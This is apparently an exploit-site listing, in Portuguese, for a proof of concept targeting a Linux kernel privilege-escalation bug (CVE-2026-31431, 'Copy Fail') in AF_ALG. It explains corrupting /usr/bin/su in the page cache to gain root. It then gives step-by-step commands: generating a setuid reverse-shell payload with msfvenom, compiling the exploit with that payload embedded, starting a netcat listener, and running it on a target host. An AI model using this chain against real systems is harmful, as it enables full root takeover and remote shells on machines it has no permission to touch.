## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MCUB3-CVE-2026-31431
# CVE-2026-31431 (Copy Fail) — PoC em C
LPE trivial sem privilĂ©gios ao escrever 4 bytes controlados no cache de páginas de qualquer arquivo legĂvel por meio de um bug lĂłgico em `AF_ALG` (kernel 4.14 → inĂcio de 2026).
Corrompa `/usr/bin/su` em memória e execute-o → root.

## Compilar e Executar
root@kitploit:~
# 1. Gere um payload ELF (exemplo de reverse shell)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86
# 2. Compile (estático, sem sĂmbolos, payload embutido via .incbin)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c
# 3. Inicie o listener primeiro (nc -lvp <LPORT>), depois execute o exploit no host alvo
./copy_fail_x86
## Detalhes Principais
• CVE: CVE-2026-31431 • CVSS: 7.8 • Correção: commit a664bf3d603d
• Funciona em praticamente todas as distros Linux 2017–2026 (incluindo contêineres).
• Técnica: abre `/usr/bin/su` com O_RDONLY, abusa da descriptografia in-place do AEAD para inserir um payload personalizado diretamente no cache de páginas, contornando o VFS.
• Divulgação original e PoC em Python de 732 bytes → https://copy.fail
## Licença
MIT – consulte LICENSE. Apenas para fins educacionais/testes autorizados. Use por sua conta e risco.